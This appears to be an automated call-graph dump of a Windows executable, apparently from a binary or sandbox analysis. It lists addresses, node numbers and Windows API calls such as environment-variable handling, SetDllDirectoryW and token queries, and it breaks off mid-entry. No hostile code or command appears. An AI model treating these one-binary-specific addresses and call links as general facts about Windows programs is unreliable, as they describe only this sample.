EnterCriticalSection 16269->16281 16284 7ff6d6eab55b 16283->16284 16287 7ff6d6eab5cc 16284->16287 16286 7ff6d6eab582 16295 7ff6d6eab314 16287->16295 16290 7ff6d6eab607 16290->16286 16293 7ff6d6eab6b8 _wfindfirst32i64 17 API calls 16294 7ff6d6eab697 16293->16294 16296 7ff6d6eab330 GetLastError 16295->16296 16297 7ff6d6eab36b 16295->16297 16298 7ff6d6eab340 16296->16298 16297->16290 16301 7ff6d6eab380 16297->16301 16304 7ff6d6eac140 16298->16304 16302 7ff6d6eab3b4 16301->16302 16303 7ff6d6eab39c GetLastError SetLastError 16301->16303 16302->16290 16302->16293 16303->16302 16305 7ff6d6eac15f FlsGetValue 16304->16305 16306 7ff6d6eac17a FlsSetValue 16304->16306 16308 7ff6d6eac174 16305->16308 16310 7ff6d6eab35b SetLastError 16305->16310 16307 7ff6d6eac187 16306->16307 16306->16310 16309 7ff6d6eaf948 _set_fmode 11 API calls 16307->16309 16308->16306 16311 7ff6d6eac196 16309->16311 16310->16297 16312 7ff6d6eac1b4 FlsSetValue 16311->16312 16313 7ff6d6eac1a4 FlsSetValue 16311->16313 16315 7ff6d6eac1c0 FlsSetValue 16312->16315 16316 7ff6d6eac1d2 16312->16316 16314 7ff6d6eac1ad 16313->16314 16317 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16314->16317 16315->16314 16318 7ff6d6eabcac _set_fmode 11 API calls 16316->16318 16317->16310 16319 7ff6d6eac1da 16318->16319 16320 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16319->16320 16320->16310 16322 7ff6d6e9c27e RtlLookupFunctionEntry 16321->16322 16323 7ff6d6e9c294 RtlVirtualUnwind 16322->16323 16324 7ff6d6e9c09b 16322->16324 16323->16322 16323->16324 16325 7ff6d6e9c030 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16324->16325 19904 7ff6d6e9a76d 19907 7ff6d6e9a772 19904->19907 19905 7ff6d6e9b850 12 API calls 19910 7ff6d6e9a656 19905->19910 19912 7ff6d6e9a8da 19907->19912 19913 7ff6d6e9a443 19907->19913 19914 7ff6d6e9b960 19907->19914 19908 7ff6d6e9b960 12 API calls 19909 7ff6d6e9abe8 19908->19909 19911 7ff6d6e9b960 12 API calls 19909->19911 19911->19913 19912->19908 19912->19913 19913->19905 19913->19910 19915 7ff6d6e9b9c0 19914->19915 19916 7ff6d6e9befa 19915->19916 19921 7ff6d6e9b9df 19915->19921 19917 7ff6d6e9c144 8 API calls 19916->19917 19918 7ff6d6e9beff 19917->19918 19919 7ff6d6e9c010 _wfindfirst32i64 8 API calls 19920 7ff6d6e9bedc 19919->19920 19920->19912 19921->19919 20681 7ff6d6e9c2e0 20682 7ff6d6e9c2f0 20681->20682 20698 7ff6d6eaa95c 20682->20698 20684 7ff6d6e9c2fc 20704 7ff6d6e9c5d8 20684->20704 20686 7ff6d6e9c8bc 7 API calls 20688 7ff6d6e9c395 20686->20688 20687 7ff6d6e9c314 _RTC_Initialize 20696 7ff6d6e9c369 20687->20696 20709 7ff6d6e9c788 20687->20709 20690 7ff6d6e9c329 20712 7ff6d6ea9dc8 20690->20712 20696->20686 20697 7ff6d6e9c385 20696->20697 20699 7ff6d6eaa96d 20698->20699 20700 7ff6d6ea5cb4 _set_fmode 11 API calls 20699->20700 20703 7ff6d6eaa975 20699->20703 20701 7ff6d6eaa984 20700->20701 20702 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 20701->20702 20702->20703 20703->20684 20705 7ff6d6e9c5e9 20704->20705 20708 7ff6d6e9c5ee __scrt_acquire_startup_lock 20704->20708 20706 7ff6d6e9c8bc 7 API calls 20705->20706 20705->20708 20707 7ff6d6e9c662 20706->20707 20708->20687 20737 7ff6d6e9c74c 20709->20737 20711 7ff6d6e9c791 20711->20690 20713 7ff6d6ea9de8 20712->20713 20735 7ff6d6e9c335 20712->20735 20714 7ff6d6ea9df0 20713->20714 20715 7ff6d6ea9e06 GetModuleFileNameW 20713->20715 20716 7ff6d6ea5cb4 _set_fmode 11 API calls 20714->20716 20719 7ff6d6ea9e31 20715->20719 20717 7ff6d6ea9df5 20716->20717 20718 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 20717->20718 20718->20735 20752 7ff6d6ea9d68 20719->20752 20722 7ff6d6ea9e91 20727 7ff6d6ea9eb3 20722->20727 20729 7ff6d6ea9edf 20722->20729 20730 7ff6d6ea9ef8 20722->20730 20723 7ff6d6ea9e79 20724 7ff6d6ea5cb4 _set_fmode 11 API calls 20723->20724 20725 7ff6d6ea9e7e 20724->20725 20726 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20725->20726 20726->20735 20728 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20727->20728 20728->20735 20731 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20729->20731 20733 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20730->20733 20732 7ff6d6ea9ee8 20731->20732 20734 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20732->20734 20733->20727 20734->20735 20735->20696 20736 7ff6d6e9c85c InitializeSListHead 20735->20736 20738 7ff6d6e9c766 20737->20738 20740 7ff6d6e9c75f 20737->20740 20741 7ff6d6eaaf9c 20738->20741 20740->20711 20744 7ff6d6eaabd8 20741->20744 20751 7ff6d6eb11a8 EnterCriticalSection 20744->20751 20753 7ff6d6ea9db8 20752->20753 20754 7ff6d6ea9d80 20752->20754 20753->20722 20753->20723 20754->20753 20755 7ff6d6eaf948 _set_fmode 11 API calls 20754->20755 20756 7ff6d6ea9dae 20755->20756 20757 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20756->20757 20757->20753 16409 7ff6d6eb04dc 16410 7ff6d6eb06ce 16409->16410 16414 7ff6d6eb051e _isindst 16409->16414 16411 7ff6d6ea5cb4 _set_fmode 11 API calls 16410->16411 16429 7ff6d6eb06be 16411->16429 16412 7ff6d6e9c010 _wfindfirst32i64 8 API calls 16413 7ff6d6eb06e9 16412->16413 16414->16410 16415 7ff6d6eb059e _isindst 16414->16415 16430 7ff6d6eb70e4 16415->16430 16420 7ff6d6eb06fa 16422 7ff6d6eab6b8 _wfindfirst32i64 17 API calls 16420->16422 16424 7ff6d6eb070e 16422->16424 16427 7ff6d6eb05fb 16427->16429 16454 7ff6d6eb7128 16427->16454 16429->16412 16431 7ff6d6eb70f3 16430->16431 16435 7ff6d6eb05bc 16430->16435 16461 7ff6d6eb11a8 EnterCriticalSection 16431->16461 16436 7ff6d6eb64e8 16435->16436 16437 7ff6d6eb64f1 16436->16437 16438 7ff6d6eb05d1 16436->16438 16439 7ff6d6ea5cb4 _set_fmode 11 API calls 16437->16439 16438->16420 16442 7ff6d6eb6518 16438->16442 16440 7ff6d6eb64f6 16439->16440 16441 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 16440->16441 16441->16438 16443 7ff6d6eb6521 16442->16443 16444 7ff6d6eb05e2 16442->16444 16445 7ff6d6ea5cb4 _set_fmode 11 API calls 16443->16445 16444->16420 16448 7ff6d6eb6548 16444->16448 16446 7ff6d6eb6526 16445->16446 16447 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 16446->16447 16447->16444 16449 7ff6d6eb6551 16448->16449 16450 7ff6d6eb05f3 16448->16450 16451 7ff6d6ea5cb4 _set_fmode 11 API calls 16449->16451 16450->16420 16450->16427 16452 7ff6d6eb6556 16451->16452 16453 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 16452->16453 16453->16450 16462 7ff6d6eb11a8 EnterCriticalSection 16454->16462 19386 7ff6d6e9b2dc 19388 7ff6d6e9a5da 19386->19388 19387 7ff6d6e9a656 19388->19387 19390 7ff6d6e9b850 19388->19390 19391 7ff6d6e9b873 19390->19391 19392 7ff6d6e9b88f memcpy_s 19390->19392 19393 7ff6d6eae3ac 12 API calls 19391->19393 19392->19387 19393->19392 20774 7ff6d6ead2d0 20785 7ff6d6eb11a8 EnterCriticalSection 20774->20785 16463 7ff6d6e9c3cc 16484 7ff6d6e9c59c 16463->16484 16466 7ff6d6e9c518 16588 7ff6d6e9c8bc IsProcessorFeaturePresent 16466->16588 16467 7ff6d6e9c3e8 __scrt_acquire_startup_lock 16469 7ff6d6e9c522 16467->16469 16476 7ff6d6e9c406 __scrt_release_startup_lock 16467->16476 16470 7ff6d6e9c8bc 7 API calls 16469->16470 16472 7ff6d6e9c52d _CreateFrameInfo 16470->16472 16471 7ff6d6e9c42b 16473 7ff6d6e9c4b1 16490 7ff6d6e9ca04 16473->16490 16475 7ff6d6e9c4b6 16493 7ff6d6e91000 16475->16493 16476->16471 16476->16473 16577 7ff6d6eaa8e0 16476->16577 16481 7ff6d6e9c4d9 16481->16472 16584 7ff6d6e9c720 16481->16584 16485 7ff6d6e9c5a4 16484->16485 16486 7ff6d6e9c5b0 __scrt_dllmain_crt_thread_attach 16485->16486 16487 7ff6d6e9c3e0 16486->16487 16488 7ff6d6e9c5bd 16486->16488 16487->16466 16487->16467 16488->16487 16595 7ff6d6e9d1c0 16488->16595 16622 7ff6d6ebb580 16490->16622 16494 7ff6d6e9100b 16493->16494 16624 7ff6d6e989b0 16494->16624 16496 7ff6d6e9101d 16631 7ff6d6ea66e8 16496->16631 16498 7ff6d6e939ab 16638 7ff6d6e91ea0 16498->16638 16502 7ff6d6e9c010 _wfindfirst32i64 8 API calls 16503 7ff6d6e93b73 16502->16503 16582 7ff6d6e9ca48 GetModuleHandleW 16503->16582 16504 7ff6d6e939ca 16532 7ff6d6e93ab2 16504->16532 16663 7ff6d6e97d70 16504->16663 16506 7ff6d6e939ff 16507 7ff6d6e93a4b 16506->16507 16509 7ff6d6e97d70 61 API calls 16506->16509 16678 7ff6d6e98250 16507->16678 16513 7ff6d6e93a20 __std_exception_copy 16509->16513 16510 7ff6d6e93a60 16682 7ff6d6e91ca0 16510->16682 16513->16507 16516 7ff6d6e98250 58 API calls 16513->16516 16514 7ff6d6e93b2d 16522 7ff6d6e93b8d 16514->16522 16701 7ff6d6e98b80 16514->16701 16515 7ff6d6e91ca0 121 API calls 16517 7ff6d6e93a96 16515->16517 16516->16507 16520 7ff6d6e93ab7 16517->16520 16521 7ff6d6e93a9a 16517->16521 16520->16514 16814 7ff6d6e94060 16520->16814 16801 7ff6d6e92b10 16521->16801 16523 7ff6d6e93bdb 16522->16523 16522->16532 16725 7ff6d6e98de0 16522->16725 16739 7ff6d6e96ff0 16523->16739 16524 7ff6d6e93bc0 16528 7ff6d6e93bce SetDllDirectoryW 16524->16528 16529 7ff6d6e93b53 16524->16529 16528->16523 16536 7ff6d6e92b10 59 API calls 16529->16536 16532->16502 16535 7ff6d6e93ad5 16542 7ff6d6e92b10 59 API calls 16535->16542 16536->16532 16539 7ff6d6e93bf5 16565 7ff6d6e93c27 16539->16565 16846 7ff6d6e96800 16539->16846 16540 7ff6d6e93b03 16540->16514 16543 7ff6d6e93b08 16540->16543 16541 7ff6d6e93d11 16743 7ff6d6e934a0 16541->16743 16542->16532 16833 7ff6d6ea097c 16543->16833 16549 7ff6d6e93c46 16558 7ff6d6e93c88 16549->16558 16882 7ff6d6e91ee0 16549->16882 16550 7ff6d6e93c29 16554 7ff6d6e96a50 FreeLibrary 16550->16554 16552 7ff6d6e93cb9 PostMessageW GetMessageW 16553 7ff6d6e93cdc 16552->16553 16886 7ff6d6e93440 16553->16886 16554->16565 16557 7ff6d6e93d2b 16751 7ff6d6e981e0 16557->16751 16558->16532 16558->16552 16558->16553 16563 7ff6d6e93d3e 16566 7ff6d6e97d70 61 API calls 16563->16566 16565->16541 16565->16549 16568 7ff6d6e93d4a 16566->16568 16567 7ff6d6e93cec 16569 7ff6d6e96a50 FreeLibrary 16567->16569 16570 7ff6d6e93d57 PostMessageW GetMessageW 16568->16570 16571 7ff6d6e93d7a 16568->16571 16569->16532 16570->16571 16758 7ff6d6e98290 16571->16758 16578 7ff6d6eaa918 16577->16578 16579 7ff6d6eaa8f7 16577->16579 16580 7ff6d6eab188 45 API calls 16578->16580 16579->16473 16581 7ff6d6eaa91d 16580->16581 16583 7ff6d6e9ca59 16582->16583 16583->16481 16586 7ff6d6e9c731 16584->16586 16585 7ff6d6e9c4f0 16585->16471 16586->16585 16587 7ff6d6e9d1c0 7 API calls 16586->16587 16587->16585 16589 7ff6d6e9c8e2 _wfindfirst32i64 __scrt_get_show_window_mode 16588->16589 16590 7ff6d6e9c901 RtlCaptureContext RtlLookupFunctionEntry 16589->16590 16591 7ff6d6e9c966 __scrt_get_show_window_mode 16590->16591 16592 7ff6d6e9c92a RtlVirtualUnwind 16590->16592 16593 7ff6d6e9c998 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16591->16593 16592->16591 16594 7ff6d6e9c9e6 _wfindfirst32i64 16593->16594 16594->16469 16596 7ff6d6e9d1d2 16595->16596 16597 7ff6d6e9d1c8 16595->16597 16596->16487 16601 7ff6d6e9d564 16597->16601 16602 7ff6d6e9d1cd 16601->16602 16603 7ff6d6e9d573 16601->16603 16605 7ff6d6e9d5d0 16602->16605 16609 7ff6d6e9e560 16603->16609 16606 7ff6d6e9d5fb 16605->16606 16607 7ff6d6e9d5ff 16606->16607 16608 7ff6d6e9d5de DeleteCriticalSection 16606->16608 16607->16596 16608->16606 16613 7ff6d6e9e3c8 16609->16613 16614 7ff6d6e9e4b2 TlsFree 16613->16614 16619 7ff6d6e9e40c __vcrt_InitializeCriticalSectionEx 16613->16619 16615 7ff6d6e9e43a LoadLibraryExW 16617 7ff6d6e9e4d9 16615->16617 16618 7ff6d6e9e45b GetLastError 16615->16618 16616 7ff6d6e9e4f9 GetProcAddress 16616->16614 16617->16616 16620 7ff6d6e9e4f0 FreeLibrary 16617->16620 16618->16619 16619->16614 16619->16615 16619->16616 16621 7ff6d6e9e47d LoadLibraryExW 16619->16621 16620->16616 16621->16617 16621->16619 16623 7ff6d6e9ca1b GetStartupInfoW 16622->16623 16623->16475 16626 7ff6d6e989cf 16624->16626 16625 7ff6d6e98a20 WideCharToMultiByte 16625->16626 16627 7ff6d6e98ac6 16625->16627 16626->16625 16626->16627 16628 7ff6d6e98a74 WideCharToMultiByte 16626->16628 16630 7ff6d6e989d7 __std_exception_copy 16626->16630 16920 7ff6d6e929c0 16627->16920 16628->16626 16628->16627 16630->16496 16634 7ff6d6eb0840 16631->16634 16632 7ff6d6eb0893 16633 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 16632->16633 16637 7ff6d6eb08bc 16633->16637 16634->16632 16635 7ff6d6eb08e6 16634->16635 17286 7ff6d6eb0718 16635->17286 16637->16498 16639 7ff6d6e91eb5 16638->16639 16640 7ff6d6e91ed0 16639->16640 17294 7ff6d6e92870 16639->17294 16640->16532 16642 7ff6d6e93f00 16640->16642 16643 7ff6d6e9bfb0 16642->16643 16644 7ff6d6e93f0c GetModuleFileNameW 16643->16644 16645 7ff6d6e93f3e 16644->16645 16646 7ff6d6e93f55 16644->16646 16647 7ff6d6e929c0 57 API calls 16645->16647 17334 7ff6d6e98ef0 16646->17334 16655 7ff6d6e93f51 16647->16655 16650 7ff6d6e93f80 17345 7ff6d6e940e0 16650->17345 16651 7ff6d6e93f70 16652 7ff6d6e92b10 59 API calls 16651->16652 16652->16655 16654 7ff6d6e9c010 _wfindfirst32i64 8 API calls 16657 7ff6d6e93fd9 16654->16657 16655->16654 16657->16504 16658 7ff6d6e91ee0 49 API calls 16659 7ff6d6e93fa5 16658->16659 16659->16655 16660 7ff6d6e93fac 16659->16660 17353 7ff6d6e94340 16660->17353 16664 7ff6d6e97d7a 16663->16664 16665 7ff6d6e98de0 57 API calls 16664->16665 16666 7ff6d6e97d9c GetEnvironmentVariableW 16665->16666 16667 7ff6d6e97db4 ExpandEnvironmentStringsW 16666->16667 16668 7ff6d6e97e06 16666->16668 16670 7ff6d6e98ef0 59 API calls 16667->16670 16669 7ff6d6e9c010 _wfindfirst32i64 8 API calls 16668->16669 16671 7ff6d6e97e18 16669->16671 16672 7ff6d6e97ddc 16670->16672 16671->16506 16672->16668 16673 7ff6d6e97de6 16672->16673 17368 7ff6d6eab1bc 16673->17368 16676 7ff6d6e9c010 _wfindfirst32i64 8 API calls 16677 7ff6d6e97dfe 16676->16677 16677->16506 16679 7ff6d6e98de0 57 API calls 16678->16679 16680 7ff6d6e98267 SetEnvironmentVariableW 16679->16680 16681 7ff6d6e9827f __std_exception_copy 16680->16681 16681->16510 16683 7ff6d6e91cae 16682->16683 16684 7ff6d6e91ee0 49 API calls 16683->16684 16685 7ff6d6e91ce4 16684->16685 16686 7ff6d6e91ee0 49 API calls 16685->16686 16695 7ff6d6e91dce 16685->16695 16688 7ff6d6e91d0a 16686->16688 16687 7ff6d6e9c010 _wfindfirst32i64 8 API calls 16689 7ff6d6e91e5c 16687->16689 16688->16695 17375 7ff6d6e91a90 16688->17375 16689->16514 16689->16515 16693 7ff6d6e91dbc 16694 7ff6d6e93e80 49 API calls 16693->16694 16694->16695 16695->16687 16696 7ff6d6e91d7f 16696->16693 16697 7ff6d6e91e24 16696->16697 16698 7ff6d6e93e80 49 API calls 16697->16698 16699 7ff6d6e91e31 16698->16699 17411 7ff6d6e94140 16699->17411 16702 7ff6d6e98b95 16701->16702 17453 7ff6d6e98860 GetCurrentProcess OpenProcessToken 16702->17453 16705 7ff6d6e98860 7 API calls 16706 7ff6d6e98bc1 16705->16706 16707 7ff6d6e98bf4 16706->16707 16708 7ff6d6e98bda 16706->16708 16710 7ff6d6e98950 48 API calls 16707->16710 17463 7ff6d6e98950 16708->17463 16712 7ff6d6e98c07 LocalFree LocalFree 16710->16712 16713 7ff6d6e98c23 16712->16713 16715 7ff6d6e98c2f 16712->16715 17467 7ff6d6e92c30 16713->17467 16716 7ff6d6e9c010 _wfindfirst32i64 8 API calls 16715->16716 16717 7ff6d6e93b4e 16716->16717 16717->16529 16718 7ff6d6e914e0 16717->16718 16719 7ff6d6e914f6 16718->16719 16720 7ff6d6e9156f 16718->16720 17674 7ff6d6e97b60 16719->17674 16720->16522 16726 7ff6d6e98e01 MultiByteToWideChar 16725->16726 16727 7ff6d6e98e87 MultiByteToWideChar 16725->16727 16730 7ff6d6e98e27 16726->16730 16733 7ff6d6e98e4c 16726->16733 16728 7ff6d6e98ecf 16727->16728 16729 7ff6d6e98eaa 16727->16729 16728->16524 16731 7ff6d6e929c0 55 API calls 16729->16731 16732 7ff6d6e929c0 55 API calls 16730->16732 16734 7ff6d6e98ebd 16731->16734 16735 7ff6d6e98e3a 16732->16735 16733->16727 16736 7ff6d6e98e62 16733->16736 16734->16524 16735->16524 16737 7ff6d6e929c0 55 API calls 16736->16737 16738 7ff6d6e98e75 16737->16738 16738->16524 16740 7ff6d6e97005 16739->16740 16741 7ff6d6e93be0 16740->16741 16742 7ff6d6e92870 59 API calls 16740->16742 16741->16565 16837 7ff6d6e96ca0 16741->16837 16742->16741 16744 7ff6d6e93554 16743->16744 16748 7ff6d6e93513 16743->16748 16745 7ff6d6e9c010 _wfindfirst32i64 8 API calls 16744->16745 16746 7ff6d6e935a5 16745->16746 16746->16532 16750 7ff6d6e98b50 LocalFree 16746->16750 16748->16744 17997 7ff6d6e91700 16748->17997 18039 7ff6d6e92d50 16748->18039 16750->16557 16752 7ff6d6e98de0 57 API calls 16751->16752 16753 7ff6d6e981ff 16752->16753 16754 7ff6d6e98de0 57 API calls 16753->16754 16755 7ff6d6e9820f 16754->16755 16756 7ff6d6ea8610 38 API calls 16755->16756 16757 7ff6d6e9821d __std_exception_copy 16756->16757 16757->16563 16802 7ff6d6e92b30 16801->16802 16803 7ff6d6ea52b4 49 API calls 16802->16803 16804 7ff6d6e92b7b __scrt_get_show_window_mode 16803->16804 16805 7ff6d6e98de0 57 API calls 16804->16805 16806 7ff6d6e92bb0 16805->16806 16807 7ff6d6e92bb5 16806->16807 16808 7ff6d6e92bed MessageBoxA 16806->16808 16809 7ff6d6e98de0 57 API calls 16807->16809 16810 7ff6d6e92c07 16808->16810 16811 7ff6d6e92bcf MessageBoxW 16809->16811 16812 7ff6d6e9c010 _wfindfirst32i64 8 API calls 16810->16812 16811->16810 16813 7ff6d6e92c17 16812->16813 16813->16532 16815 7ff6d6e9406c 16814->16815 16816 7ff6d6e98de0 57 API calls 16815->16816 16817 7ff6d6e94097 16816->16817 16818 7ff6d6e98de0 57 API calls 16817->16818 16819 7ff6d6e940aa 16818->16819 18567 7ff6d6ea69e4 16819->18567 16822 7ff6d6e9c010 _wfindfirst32i64 8 API calls 16823 7ff6d6e93acd 16822->16823 16823->16535 16824 7ff6d6e984c0 16823->16824 16825 7ff6d6e984e4 16824->16825 16826 7ff6d6ea1004 73 API calls 16825->16826 16831 7ff6d6e985bb __std_exception_copy 16825->16831 16827 7ff6d6e984fe 16826->16827 16827->16831 18946 7ff6d6ea9894 16827->18946 16831->16540 16834 7ff6d6ea09ac 16833->16834 18961 7ff6d6ea0758 16834->18961 16838 7ff6d6e96cc3 16837->16838 16839 7ff6d6e96cda 16837->16839 16838->16839 18972 7ff6d6e91590 16838->18972 16839->16539 16841 7ff6d6e96ce4 16841->16839 16842 7ff6d6e94140 49 API calls 16841->16842 16843 7ff6d6e96d45 16842->16843 16844 7ff6d6e92b10 59 API calls 16843->16844 16845 7ff6d6e96db5 __std_exception_copy memcpy_s 16843->16845 16844->16839 16845->16539 16860 7ff6d6e9681a memcpy_s 16846->16860 16848 7ff6d6e9693f 16849 7ff6d6e94140 49 API calls 16848->16849 16851 7ff6d6e969b8 16849->16851 16850 7ff6d6e9695b 16852 7ff6d6e92b10 59 API calls 16850->16852 16855 7ff6d6e94140 49 API calls 16851->16855 16858 7ff6d6e96951 __std_exception_copy 16852->16858 16853 7ff6d6e94140 49 API calls 16853->16860 16854 7ff6d6e96920 16854->16848 16856 7ff6d6e94140 49 API calls 16854->16856 16857 7ff6d6e969e8 16855->16857 16856->16848 16862 7ff6d6e94140 49 API calls 16857->16862 16859 7ff6d6e9c010 _wfindfirst32i64 8 API calls 16858->16859 16861 7ff6d6e93c06 16859->16861 16860->16848 16860->16850 16860->16853 16860->16854 16863 7ff6d6e91700 135 API calls 16860->16863 16864 7ff6d6e96941 16860->16864 18996 7ff6d6e91940 16860->18996 16861->16550 16866 7ff6d6e96780 16861->16866 16862->16858 16863->16860 16865 7ff6d6e92b10 59 API calls 16864->16865 16865->16858 19000 7ff6d6e98470 16866->19000 16868 7ff6d6e9679c 16869 7ff6d6e98470 58 API calls 16868->16869 16870 7ff6d6e967af 16869->16870 16871 7ff6d6e967e5 16870->16871 16872 7ff6d6e967c7 16870->16872 16873 7ff6d6e92b10 59 API calls 16871->16873 19004 7ff6d6e97100 GetProcAddress 16872->19004 16883 7ff6d6e91f05 16882->16883 16884 7ff6d6ea52b4 49 API calls 16883->16884 16885 7ff6d6e91f28 16884->16885 16885->16558 19063 7ff6d6e95dd0 16886->19063 16889 7ff6d6e9348d 16889->16567 16939 7ff6d6e9bfb0 16920->16939 16923 7ff6d6e92a09 16941 7ff6d6ea52b4 16923->16941 16928 7ff6d6e91ee0 49 API calls 16929 7ff6d6e92a66 __scrt_get_show_window_mode 16928->16929 16930 7ff6d6e98de0 54 API calls 16929->16930 16931 7ff6d6e92a9b 16930->16931 16932 7ff6d6e92aa0 16931->16932 16933 7ff6d6e92ad8 MessageBoxA 16931->16933 16934 7ff6d6e98de0 54 API calls 16932->16934 16935 7ff6d6e92af2 16933->16935 16936 7ff6d6e92aba MessageBoxW 16934->16936 16937 7ff6d6e9c010 _wfindfirst32i64 8 API calls 16935->16937 16936->16935 16938 7ff6d6e92b02 16937->16938 16938->16630 16940 7ff6d6e929dc GetLastError 16939->16940 16940->16923 16943 7ff6d6ea530e 16941->16943 16942 7ff6d6ea5333 16944 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 16942->16944 16943->16942 16945 7ff6d6ea536f 16943->16945 16947 7ff6d6ea535d 16944->16947 16971 7ff6d6ea3540 16945->16971 16950 7ff6d6e9c010 _wfindfirst32i64 8 API calls 16947->16950 16948 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16948->16947 16951 7ff6d6e92a37 16950->16951 16959 7ff6d6e98770 16951->16959 16952 7ff6d6ea544c 16952->16948 16953 7ff6d6ea5421 16955 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16953->16955 16954 7ff6d6ea5470 16954->16952 16957 7ff6d6ea547a 16954->16957 16955->16947 16956 7ff6d6ea5418 16956->16952 16956->16953 16958 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16957->16958 16958->16947 16960 7ff6d6e9877c 16959->16960 16961 7ff6d6e98797 GetLastError 16960->16961 16962 7ff6d6e9879d FormatMessageW 16960->16962 16961->16962 16963 7ff6d6e987d0 16962->16963 16964 7ff6d6e987ec WideCharToMultiByte 16962->16964 16965 7ff6d6e929c0 54 API calls 16963->16965 16966 7ff6d6e98826 16964->16966 16967 7ff6d6e987e3 16964->16967 16965->16967 16968 7ff6d6e929c0 54 API calls 16966->16968 16969 7ff6d6e9c010 _wfindfirst32i64 8 API calls 16967->16969 16968->16967 16970 7ff6d6e92a3e 16969->16970 16970->16928 16972 7ff6d6ea357e 16971->16972 16973 7ff6d6ea356e 16971->16973 16974 7ff6d6ea35b5 16972->16974 16975 7ff6d6ea3587 16972->16975 16976 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 16973->16976 16974->16973 16978 7ff6d6ea35ad 16974->16978 16981 7ff6d6ea3864 16974->16981 16985 7ff6d6ea3ed0 16974->16985 17011 7ff6d6ea3b98 16974->17011 17041 7ff6d6ea3420 16974->17041 17044 7ff6d6ea50f0 16974->17044 16977 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 16975->16977 16976->16978 16977->16978 16978->16952 16978->16953 16978->16954 16978->16956 16983 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 16981->16983 16983->16973 16986 7ff6d6ea3f12 16985->16986 16987 7ff6d6ea3f85 16985->16987 16988 7ff6d6ea3faf 16986->16988 16989 7ff6d6ea3f18 16986->16989 16990 7ff6d6ea3fdf 16987->16990 16991 7ff6d6ea3f8a 16987->16991 17068 7ff6d6ea2480 16988->17068 16992 7ff6d6ea3fee 16989->16992 16997 7ff6d6ea3f1d 16989->16997 16990->16988 16990->16992 17009 7ff6d6ea3f48 16990->17009 16993 7ff6d6ea3fbf 16991->16993 16994 7ff6d6ea3f8c 16991->16994 17010 7ff6d6ea401d 16992->17010 17082 7ff6d6ea2890 16992->17082 17075 7ff6d6ea2070 16993->17075 16999 7ff6d6ea3f9b 16994->16999 17002 7ff6d6ea3f2d 16994->17002 17000 7ff6d6ea3f60 16997->17000 16997->17002 16997->17009 16999->16988 17003 7ff6d6ea3fa0 16999->17003 17000->17010 17060 7ff6d6ea4cf0 17000->17060 17002->17010 17050 7ff6d6ea4834 17002->17050 17003->17010 17064 7ff6d6ea4e88 17003->17064 17005 7ff6d6e9c010 _wfindfirst32i64 8 API calls 17007 7ff6d6ea42b3 17005->17007 17007->16974 17009->17010 17089 7ff6d6eaf608 17009->17089 17010->17005 17012 7ff6d6ea3ba3 17011->17012 17013 7ff6d6ea3bb9 17011->17013 17015 7ff6d6ea3bf7 17012->17015 17016 7ff6d6ea3f12 17012->17016 17017 7ff6d6ea3f85 17012->17017 17014 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 17013->17014 17013->17015 17014->17015 17015->16974 17018 7ff6d6ea3faf 17016->17018 17019 7ff6d6ea3f18 17016->17019 17020 7ff6d6ea3fdf 17017->17020 17021 7ff6d6ea3f8a 17017->17021 17025 7ff6d6ea2480 38 API calls 17018->17025 17028 7ff6d6ea3f1d 17019->17028 17031 7ff6d6ea3fee 17019->17031 17020->17018 17020->17031 17036 7ff6d6ea3f48 17020->17036 17022 7ff6d6ea3fbf 17021->17022 17023 7ff6d6ea3f8c 17021->17023 17026 7ff6d6ea2070 38 API calls 17022->17026 17024 7ff6d6ea3f2d 17023->17024 17029 7ff6d6ea3f9b 17023->17029 17027 7ff6d6ea4834 47 API calls 17024->17027 17040 7ff6d6ea401d 17024->17040 17025->17036 17026->17036 17027->17036 17028->17024 17030 7ff6d6ea3f60 17028->17030 17028->17036 17029->17018 17033 7ff6d6ea3fa0 17029->17033 17034 7ff6d6ea4cf0 47 API calls 17030->17034 17030->17040 17032 7ff6d6ea2890 38 API calls 17031->17032 17031->17040 17032->17036 17037 7ff6d6ea4e88 37 API calls 17033->17037 17033->17040 17034->17036 17035 7ff6d6e9c010 _wfindfirst32i64 8 API calls 17038 7ff6d6ea42b3 17035->17038 17039 7ff6d6eaf608 47 API calls 17036->17039 17036->17040 17037->17036 17038->16974 17039->17036 17040->17035 17245 7ff6d6ea1644 17041->17245 17045 7ff6d6ea5107 17044->17045 17262 7ff6d6eae768 17045->17262 17051 7ff6d6ea4856 17050->17051 17099 7ff6d6ea14b0 17051->17099 17056 7ff6d6ea50f0 45 API calls 17058 7ff6d6ea4993 17056->17058 17057 7ff6d6ea50f0 45 API calls 17059 7ff6d6ea4a1c 17057->17059 17058->17057 17058->17058 17058->17059 17059->17009 17061 7ff6d6ea4d08 17060->17061 17062 7ff6d6ea4d70 17060->17062 17061->17062 17063 7ff6d6eaf608 47 API calls 17061->17063 17062->17009 17063->17062 17067 7ff6d6ea4ea9 17064->17067 17065 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 17066 7ff6d6ea4eda 17065->17066 17066->17009 17067->17065 17067->17066 17069 